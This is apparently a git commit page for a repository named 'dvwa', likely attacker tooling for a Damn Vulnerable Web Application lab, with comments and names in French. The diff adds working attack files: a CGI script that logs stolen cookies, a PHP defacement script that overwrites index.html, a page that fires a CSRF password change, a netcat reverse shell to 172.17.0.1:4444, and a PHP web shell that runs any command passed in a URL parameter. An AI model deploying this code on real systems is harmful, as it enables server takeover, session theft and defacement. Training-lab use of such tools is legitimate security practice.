summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorjerome <jerome@xlinfo.fr>2023-09-19 17:02:40 +0200
committerjerome <jerome@xlinfo.fr>2023-09-19 17:02:40 +0200
commit2585495cfab54366a668777216b88a4f4b686102 (patch)
tree9487b4d11eba4f46566a4a99bcef512d79717e74
downloaddvwa-2585495cfab54366a668777216b88a4f4b686102.tar.gz
dvwa-2585495cfab54366a668777216b88a4f4b686102.zip
commit initial
-rwxr-xr-xcgi-bin/voleurCookie.cgi11
-rw-r--r--defacage.php15
-rw-r--r--hack.jpegbin0 -> 4807 bytes
-rw-r--r--hack.pngbin0 -> 4364 bytes
-rw-r--r--index_tpl.html13
-rw-r--r--log.txt0
-rw-r--r--phpinfo.php3
-rw-r--r--reverseshell.php3
-rw-r--r--webshell.php19
9 files changed, 64 insertions, 0 deletions
diff --git a/cgi-bin/voleurCookie.cgi b/cgi-bin/voleurCookie.cgi
new file mode 100755
index 0000000..db17db7
--- /dev/null
+++ b/cgi-bin/voleurCookie.cgi
@@ -0,0 +1,11 @@
+#!/usr/bin/env python3
+import cgi
+import datetime
+import os
+
+print(os.system("whoami"))
+
+form = cgi.FieldStorage()
+cookies =form.getvalue('c')
+with open("log.txt", "a") as fichier:
+ fichier.write("\n"+str(datetime.datetime.now())+" "+cookies)
diff --git a/defacage.php b/defacage.php
new file mode 100644
index 0000000..48f73ad
--- /dev/null
+++ b/defacage.php
@@ -0,0 +1,15 @@
+<?php
+$html='
+<!DOCTYPE html>
+<head>
+<meta charset="UTF-8">
+<title>HaCkÉ pAr BIbi</title>
+</head>
+<body>
+<h1>T\'es HaCkÉ par bIbI! </h1>
+<img src="http://172.17.0.1/hack.jpeg" alt="" />
+</body>
+</html>';
+$fp = fopen('../../index.html', 'w+');
+fwrite($fp, $html);
+fclose($fp);
diff --git a/hack.jpeg b/hack.jpeg
new file mode 100644
index 0000000..bf41bc7
--- /dev/null
+++ b/hack.jpeg
Binary files differ
diff --git a/hack.png b/hack.png
new file mode 100644
index 0000000..dbd2be8
--- /dev/null
+++ b/hack.png
Binary files differ
diff --git a/index_tpl.html b/index_tpl.html
new file mode 100644
index 0000000..e613012
--- /dev/null
+++ b/index_tpl.html
@@ -0,0 +1,13 @@
+<!DOCTYPE html>
+<html>
+<head>
+<meta charset="UTF-8">
+<title>HaCkÉ pAr BIbi</title>
+</head>
+<body>
+<h1>T'es HaCkÉ par bIbI! </h1>
+<img src="http://172.17.0.1/hack.jpeg" alt="" />
+<img src="http://172.17.0.2/vulnerabilities/csrf/?password_new=newpass&password_conf=newpass&Change=Change" />
+</body>
+</html>
+
diff --git a/log.txt b/log.txt
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/log.txt
diff --git a/phpinfo.php b/phpinfo.php
new file mode 100644
index 0000000..cf60860
--- /dev/null
+++ b/phpinfo.php
@@ -0,0 +1,3 @@
+<?php
+phpinfo();
+?>
diff --git a/reverseshell.php b/reverseshell.php
new file mode 100644
index 0000000..754c35d
--- /dev/null
+++ b/reverseshell.php
@@ -0,0 +1,3 @@
+<?php
+exec("nc 172.17.0.1 4444 -e /bin/bash >/dev/null &");
+?>
diff --git a/webshell.php b/webshell.php
new file mode 100644
index 0000000..679bb7a
--- /dev/null
+++ b/webshell.php
@@ -0,0 +1,19 @@
+<!DOCTYPE html>
+<html>
+<head>
+<title>Web shell</title>
+</head>
+<body>
+<h1>Web shell</h1>
+<p>Votre commande :
+<?php if (isset($_GET['cmd'])) echo $_GET['cmd'] ?>
+</p>
+<form>
+<input type="text" name="cmd" autofocus />
+<input type="submit" />
+</form>
+<pre>
+<?php if (isset($_GET['cmd'])) system($_GET['cmd']) ?>
+</pre>
+</body>
+</html>